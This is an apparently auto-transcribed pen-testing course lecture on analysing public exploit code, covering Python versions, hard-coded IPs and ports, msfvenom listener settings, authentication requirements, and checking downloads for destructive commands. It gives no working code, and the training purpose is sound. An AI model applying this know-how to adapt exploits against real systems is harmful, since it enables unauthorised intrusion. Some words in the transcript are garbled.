21 hours 43 minutes
understanding the code
are learning objectives are to understand how to analyze exploit code,
interpret what the code does and check if the exploit code is malicious to our own machines,
I did some bash scripting and I did some python scripting and still now I just say I can script
but um you do generally need to know what code does and you did that in the buffer overflow lab is and and the whole that whole module is your writing code. You're writing code to exploit a buffer overflow vulnerability in python.
And if you notice it was written in python two and now we're using python three and even that it takes some getting used to it. If you know python two
um you need to know how to modify that code to fit python three and you'll notice that the author of do stack buffer overflow, good talks about his exploit code and how he changed it and how it has to be changed
to fit python three. But if you know python two and you look at a python three script you generally know what's going on. It's like you know I can speak spanish um and I also have heard people speak italian and I know that some words can be very similar
so it is kind of like that and it goes to the same with other types of code. I don't know java I don't know C Sharp but I should at least study enough to know what the code is doing because the worst thing that could happen is I pull somebody's code from GIT hub and I have no idea what it does
and it just doss is my box because someone thought it would be funny
if someone pulled code from their website and you know, now they're laughing at us because we've, we've erased all of our files
or they've created a backdoor. So again, it is really important to know what the code is doing. So no enough of the code to and also that's being good pen tester, right? You have to be able to explain to a client the exploit that you used and what it did.
And if you have no idea, well you don't look like a very professional pen tester. So
that's why you should know what the code does.
So of course that you have to actually read the code and a lot of this code will have comments in them. And that's why I picked this Konica Minolta vulnerability one because it's a buffer overflow, which we just did. So it kind of, you're you're used to looking at that code.
And the other thing is there's lots of comments in that code, so it's very verbose and it's very helpful. So you'll, you'll notice in things like the dirty cow exploit and a lot of those that will tell you how to compile that code correctly. And that's what will happen when you get these colonel exploits
is if you have to you have to compile them correctly
so that they work and if you don't, well then it's not going to work correctly. So
if someone is doing a good job of, of being helpful to other hackers, they're going to put comments in their code to help us understand what it does.
You'll also notice a lot of the time there's hard coded information, there's hard coded ports, someone's going to assume it's an FTP vulnerability is going to be on port 21 or Ssh is port 22. As we've seen, that's not always the case. People change ports so be cognizant of that.
You saw the SMTP one was Port 25.
What if it's on port 25 25 or some other random port? So you have to be able to spot those IP addresses that are hard coded
as well as the ports and and change them if necessary.
So again, we're looking at this Konica Minolta exploit script and I talked about this before.
He tells you a lot uh what software it what software it was tested on, what, what version of Windows it was tested on how to set up a net cat listener and what it looks like when the exploit works as you should get this
command line prompt in the Windows box.
Um So and also realize is this python two or is this pipe python three with the shebang user bin python?
So be aware of that. If you're trying to run python three on this code, will it work?
So again, no, no what version of python this looks like or is.
Um So you'll also notice in this code
a hard coded I. P. Address with MSF venom. We've used MSF venom a lot. The listening host you see is hard coded and the and the listening port is hard coded. That is of course something that we're going to have to change
in our environment because we're not gonna have the same ip address. I can bet you that
also notice with exploits if you have to be authenticated or not. If you're if you don't have,
if you don't have the login credentials, well then it's not gonna work right because you need to have the user name and password to authenticate um into the application to exploit the vulnerability. You can see this is a Wordpress plug in that only works. If you're authenticated into the application, you'll notice that with a lot of wordpress plug ins is
you have to be authenticated to exploit it. Well pay attention to that and you should notice that with your WP skin output. I prioritize the unauthenticated over the authenticated. If I don't have a login and password. Right? Because it's going to be a whole lot easier
for an unauthenticated file upload vulnerability than an authenticated sequel injection.
Also be aware it has H G p vulnerable site dot com.
Of course ours isn't gonna say vulnerable site dot com. Um you know ours could be an I. P address and we could have a different wordpress directory, it could be, you know, 19216817
Wordpress and then WP admin.
So realize that
right here with action you may have to change the vulnerable site and the path
of this of this site to have your exploit work.
So in summary, we should now understand how to analyze exploit code. I know you're not going to be an expert. I really recommend taking some basic coding classes and like python, I know python is very popular
but I would just just so generally you understand what code does.
You should be able to interpret what the exploit code does.
Google again, is your friend. If you just want to google certain syntax, you know, what's import system or import socket in python, what is that doing? Google it, you know, it's in your code for
for the FTP vulnerability, what our libraries in python, you should know what those are.
And also check of the exploit code is malicious to your own machine.
Of course, you know, we've done command line labs um and they note this in the P W K material that some code that they saw, like removed everything within the box are mrf, you know, it it removes
everything and it's a malicious script. So
that's why I talk about GIT hub being careful exploit DB. If there's a check mark, I wouldn't worry so much about, but nowhere you're downloading the code from and
check and make sure you understand what the code does because again, a good pen tester is going to be able to explain to a client
what the code is doing, why why this exploit code is working,
so I will see you in the next lesson.